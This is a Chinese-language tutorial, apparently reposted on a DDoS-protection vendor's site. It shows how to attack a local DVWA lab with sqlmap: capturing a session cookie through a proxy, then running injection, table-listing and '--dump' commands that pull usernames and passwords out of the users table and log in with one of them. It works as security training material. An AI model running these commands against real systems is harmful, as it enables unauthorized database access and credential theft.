DDOS防御专家-提供超强DDoS高防/CC防护/大流量清洗服务!
当前位置:主页 > WEB安全 > 正文

sqlmap注入,杀入靶机

09-18 WEB安全

用phpstudy 链接 dvwa 搭建一个环境
 
而后呢,我们要使用抓包软件抓一下dvwa的cookie
 
 
让我们先来看一下演示:
 
首先进入dvwa 将难度设置为low(为了演示方便)
 
 

sqlmap注入,杀入靶机


 
 
接着呢 要使用用抓包 抓出dvwa登录时的cookie
 
 
首先配置代理,在这里呢  我设置代理端口为默认:8080 如下图所示
 

sqlmap注入,杀入靶机


 
 
 

sqlmap注入,杀入靶机


 
打开抓取按钮  刷新页面
 
可以看到 
 
Cookies为  security=low; PHPSESSID=m04sk2chd2m6k381lcqrjukja4
 
所以 我们使用cookie 进行爆破测试
 
 
 
打开 sqlmap  让我来一起进行试验
 
 
我们有cookie 所以使用cookie方式注入
 
首先使用命令:
 
 
C:\Python27\sqlmap>sqlmap.py -u "
?id=aa&Submit=Submit#" --cookie="security=low; PHPSESSID=m04sk2chd2m6k381lcqrjuk
ja4"
 
 
 
 
 

sqlmap注入,杀入靶机


sqlmap注入,杀入靶机


 
 
 
我们可以看到 已经注入成功
 
接着我们爆出表--->
 
 
爆出 dvwa下的表名命令:
 
C:\Python27\sqlmap>sqlmap.py -u "
?id=aa&Submit=Submit#" --cookie="security=low; PHPSESSID=m04sk2chd2m6k381lcqrjuk
ja4" -D dvwa --tables

sqlmap注入,杀入靶机


 
 
 
我们可以看到 dvwa下有 两个表单 一个为guestbook  一个为 users 
 
很明显 users下有我们想要的东西
 
 
所以 我们就爆出users下面的字段
 
使用命令:
 
C:\Python27\sqlmap>sqlmap.p-u    "
?id=aa&Submit=Submit#" --cookie="security=low; PHPSESSID=m04sk2chd2m6k381lcqrjuk
ja4" -D dvwa --tables --dump -T Users
 
 
 

sqlmap注入,杀入靶机


 
 
喏,这时,我们可以明显看到  users表单中 所爆出来的 账号密码一共有5组,这样 我们随便拿个账号试验一下看能否登录进去
 
这个长得顺眼 咱们就用这个:
账号为:pablo  密码为:letmein

sqlmap注入,杀入靶机


sqlmap注入,杀入靶机


 
 
 
Ok,成功登入进去
 

 

【声明】:黑吧安全网()登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。

版权保护: 本文由 DDOS防御专家 原创,转载请保留链接: http://www.ddosgb.com//web/124.html

DDoS防御专家简介孤之剑
国内资深白帽子二十人组成员,前BAT资深网络安全工程师,知名网络安全站点板块大神,每年提交Google及微软漏洞,原sina微博负载插件开发者,现在整体防御复合攻击长期接受1-4.7T攻击,CC防护自主开发指纹识别系统,可以做到99.9999%的无敌防御。
  • 文章总数
  • 722652访问次数
  • 建站天数

    DDOS防御

    ddos防御

    cc防护

    web安全

    高防服务器

    高防cdn


    QQ客服

    400-0797-119

    X